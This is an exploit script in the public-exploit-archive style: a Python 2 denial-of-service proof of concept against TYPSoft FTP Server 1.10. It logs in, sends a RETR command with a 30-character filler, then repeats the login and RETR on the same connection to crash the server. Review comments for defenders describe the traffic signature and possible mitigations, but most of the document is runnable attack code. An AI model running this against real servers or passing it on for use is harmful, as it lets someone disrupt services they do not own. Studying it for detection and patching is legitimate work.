# Exploit Title: TYPSoft FTP Server 1.10 RETR Command DoS
# Date: 5/13/2010
# Author: Jeremiah Talamantes (RedTeam Security)
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows XP, SP2 (EN)

# DESCRIPTION:
# This script exploits a weakness in the RETR command in TYPSoft v1.10
# It requires only a small buffer that is executed in succession within
# the same socket connection.
#
# NOTE(review), for defenders reading this proof of concept:
#   * The traffic is one FTP control connection to TCP/21 that logs in,
#     sends RETR with a 30-character argument, then re-sends USER/PASS and
#     the same RETR before closing. A session that re-authenticates
#     mid-connection and repeats a RETR is the pattern to look for in
#     FTP server or network logs.
#   * The script needs credentials the server will accept, and it never
#     inspects the replies, so it does not confirm that login succeeded.
#   * This page names no fixed release. Confirm the vendor status before
#     relying on an upgrade; otherwise restrict access to the service.
#   * Written for Python 2: the socket calls pass str objects to send().

#!/usr/bin/python

print("\n#################################################################")
print("## RedTeam Security ##")
print("## TYPSoft FTP Server v1.10 RETR Command DoS ##")
print("## ##")
print("## Jeremiah Talamantes ##")
print("## labs@redteamsecure.com ##")
print("################################################################# \n")

import socket
import sys


def Usage():
    """Print the usage line and the author credit to stdout."""
    print("Usage: scriptname.py \n")
    print("\n\nCredit: Jeremiah Talamantes")
    print("RedTeam Security : www.redteamsecure.com/labs\n")


# Buffer settings
# This works with a relatively small buffer
buffer = "A" * 30


def start(hostname, username, password):
    """Run the two-pass USER/PASS/RETR sequence against ``hostname`` on port 21.

    Args:
        hostname: Host to connect to; the port is fixed at 21.
        username: Value sent in the USER command.
        password: Value sent in the PASS command.

    Exits the process with status 1 when the TCP connection cannot be
    opened. Server replies are read but never checked, apart from the
    greeting, which is printed.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        conn.connect((hostname, 21))
    except:
        # NOTE(review): the bare except also catches KeyboardInterrupt, and
        # the socket is not closed on this path.
        print("Error: unable to connect to host")
        sys.exit(1)

    # Greeting sent by the server on connect.
    greeting = conn.recv(1024)
    print("[+] " + greeting)

    user_cmd = "USER %s\r\n" % username
    pass_cmd = "PASS %s\r\n" % password
    retr_cmd = "RETR %s\r\n" % buffer

    # First pass: log in, then issue RETR with the filler argument.
    conn.send(user_cmd)
    reply = conn.recv(1024)
    conn.send(pass_cmd)
    reply = conn.recv(1024)

    print("Sending the malicious chars...")
    conn.send(retr_cmd)

    # Second pass on the same connection (author's note: "repeat to
    # overflow"). No reply to either RETR is read.
    conn.send(user_cmd)
    reply = conn.recv(1024)
    conn.send(pass_cmd)
    reply = conn.recv(1024)
    conn.send(retr_cmd)

    conn.close()


# Exactly three positional arguments are required: host, user, password.
if len(sys.argv) != 4:
    Usage()
    sys.exit(1)

hostname, username, password = sys.argv[1], sys.argv[2], sys.argv[3]
start(hostname, username, password)
sys.exit(0)

# end